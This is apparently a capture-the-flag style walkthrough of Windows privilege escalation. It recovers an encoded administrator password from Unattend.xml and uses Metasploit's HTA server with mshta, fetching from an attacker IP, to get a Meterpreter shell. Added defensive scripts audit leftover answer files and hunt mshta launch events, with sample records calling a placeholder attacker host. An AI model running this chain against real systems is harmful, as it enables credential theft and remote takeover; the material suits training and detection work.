PowerUp Privilege Escalation

Unintended Installation

Step 1: We will run the PowerUp.ps1 PowerShell script to find privilege escalation vulnerabilities.

Step 2: Import the PowerUp.ps1 script and run the Invoke-PrivescAudit function.

The audit output shows that an Unattend.xml file is present on the system. Open the Unattend.xml file.

Unattend.xml: Unattend.xml is an answer file used for unattended Windows installation. Such files may contain encoded or plain-text credentials and other sensitive information, and are frequently left behind after deployment.
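The following PowerShell script is an added example from the defender's side; it is not part of the original lab and not PowerUp code. It checks the commonly documented answer-file locations (the path list is an assumption and should be extended for your own imaging process), reports any file that still carries a `Password` element, and flags whether the value is stored as plain text, so the files can be removed and the affected accounts rotated before an auditor like PowerUp finds them.

```powershell
# Added example (not from the original lab): audit a host for leftover Windows
# answer files and report whether they still carry credential material.
# The paths below are commonly documented answer-file locations; treat the
# list as an assumption and extend it for your own deployment process.
$answerFilePaths = @(
    "$env:SystemDrive\unattend.xml",
    "$env:SystemDrive\sysprep.inf",
    "$env:SystemDrive\sysprep\sysprep.xml",
    "$env:SystemRoot\Panther\Unattend.xml",
    "$env:SystemRoot\Panther\Unattend\Unattend.xml",
    "$env:SystemRoot\System32\Sysprep\Unattend.xml",
    "$env:SystemRoot\System32\Sysprep\Panther\Unattend.xml"
)

function Get-AnswerFileCredentialFindings {
    param([string[]] $Paths = $answerFilePaths)

    foreach ($path in $Paths) {
        if (-not (Test-Path -LiteralPath $path -PathType Leaf)) { continue }

        $finding = [pscustomobject]@{
            Path           = $path
            PasswordNodes  = 0
            PlainTextFlag  = $false
            Recommendation = 'Delete the file once deployment is complete.'
        }

        try {
            [xml] $doc = Get-Content -LiteralPath $path -Raw -ErrorAction Stop
            # Answer files declare a namespace; match on local element names so
            # the check works regardless of the prefix the authoring tool used.
            $passwordNodes = $doc.SelectNodes("//*[local-name()='Password']")
            $finding.PasswordNodes = $passwordNodes.Count
            foreach ($node in $passwordNodes) {
                $plain = $node.SelectSingleNode("*[local-name()='PlainText']")
                if ($plain -and $plain.InnerText.Trim() -ieq 'true') {
                    $finding.PlainTextFlag = $true
                }
            }
            if ($finding.PasswordNodes -gt 0) {
                # Base64-encoded values are not protection; treat them as exposed.
                $finding.Recommendation = 'Credential material present: remove the file and rotate the affected account passwords.'
            }
        } catch {
            # sysprep.inf is INI-style, and a damaged XML file still deserves review.
            $finding.Recommendation = "Not parseable as XML ($($_.Exception.Message)); review manually and remove."
        }

        $finding
    }
}

Get-AnswerFileCredentialFindings | Format-Table -AutoSize
```

Run it as part of post-deployment hardening or a scheduled compliance check; an empty result means none of the listed locations still hold an answer file.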

Step 5: Reading the Unattend.xml file.

Command:

We have discovered an encoded administrator password, i.e. “QWRtaW5AMTIz”.

Step 6: Decoding the administrator password using PowerShell.

Commands:

The administrator password is “Admin@123”.

Step 7: We run a command prompt as the administrator user using the discovered credentials.

Commands:

We are running cmd.exe as an administrator.

Switch to the Kali Machine.

Step 8: Running the hta_server module to gain a Meterpreter shell. Start msfconsole.

Commands:

“This module hosts an HTML Application (HTA) that when opened will run a payload via Powershell.”

Copy the generated payload URL, i.e. “http://10.10.31.2:8080/Bn75U0NL8ONS.hta”, and run it from cmd.exe with the mshta command to gain the Meterpreter shell.

Switch to Target Machine.

Step 9: Gaining a Meterpreter shell.

Command:

Note: You need to use your own Metasploit HTA server link.

We can expect a Meterpreter shell.
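From the detection side, the mshta step above leaves a distinctive trail in process-creation telemetry: mshta.exe started with a remote URL on its command line, followed by a PowerShell process whose parent is mshta.exe. The script below is an added example, not part of the original lab or of Metasploit, that hunts Security log event 4688 for that pattern. It assumes "Audit Process Creation" is enabled with command-line logging (otherwise the CommandLine field is empty and only the parent/child check applies) and that the host records ParentProcessName, which Windows 10 and Server 2016 and later do. The sample records at the end are constructed, with a placeholder host, so the rule can be exercised offline.

```powershell
# Added example (not from the original lab): hunt Security event 4688 for
# mshta.exe fetching an HTA over HTTP(S) and for PowerShell spawned by mshta.exe.

function ConvertFrom-ProcessCreationEvent {
    # Flatten a 4688 EventLogRecord into the fields the detection needs.
    param([Parameter(ValueFromPipeline)] $Event)
    process {
        $xml  = [xml] $Event.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            Time    = $Event.TimeCreated
            User    = $data['SubjectUserName']
            Process = $data['NewProcessName']
            Parent  = $data['ParentProcessName']
            CmdLine = $data['CommandLine']
        }
    }
}

function Find-HtaLaunchIndicators {
    # Emit only records that match one of the two indicators, with the reason attached.
    param([Parameter(ValueFromPipeline)] $Record)
    process {
        $reasons = @()
        if ($Record.Process -like '*\mshta.exe' -and $Record.CmdLine -match 'https?://') {
            $reasons += 'mshta.exe launched with a remote URL'
        }
        if ($Record.Parent -like '*\mshta.exe' -and $Record.Process -match '\\(powershell|pwsh)\.exe$') {
            $reasons += 'PowerShell spawned by mshta.exe'
        }
        if ($reasons.Count -gt 0) {
            $Record | Add-Member -NotePropertyName Reason -NotePropertyValue ($reasons -join '; ') -PassThru
        }
    }
}

# Constructed sample records (not real telemetry) to exercise the rule offline.
$sample = @(
    [pscustomobject]@{ Time = Get-Date; User = 'admin'; Process = 'C:\Windows\System32\mshta.exe'
                       Parent = 'C:\Windows\System32\cmd.exe'
                       CmdLine = 'mshta http://ATTACKER_HOST_PLACEHOLDER:8080/PLACEHOLDER.hta' },
    [pscustomobject]@{ Time = Get-Date; User = 'admin'; Process = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       Parent = 'C:\Windows\System32\mshta.exe'
                       CmdLine = 'powershell -nop -w hidden -e PLACEHOLDER' },
    [pscustomobject]@{ Time = Get-Date; User = 'user'; Process = 'C:\Windows\System32\notepad.exe'
                       Parent = 'C:\Windows\explorer.exe'
                       CmdLine = 'notepad.exe' }   # benign, must not match
)
$sample | Find-HtaLaunchIndicators | Format-Table Time, User, Parent, Process, Reason -AutoSize

# Live hunt over the last 24 hours (run elevated on the host being investigated).
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddDays(-1) } |
    ConvertFrom-ProcessCreationEvent |
    Find-HtaLaunchIndicators |
    Format-Table Time, User, Parent, Process, Reason -AutoSize
```

On the constructed sample, the first two records are reported and the notepad record is not. If Sysmon is deployed, the same two conditions map onto Event ID 1 (`Image`, `ParentImage`, `CommandLine`) with only the field names changed.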

Step 10: Find the flag.

Commands:

This reveals the flag to us.
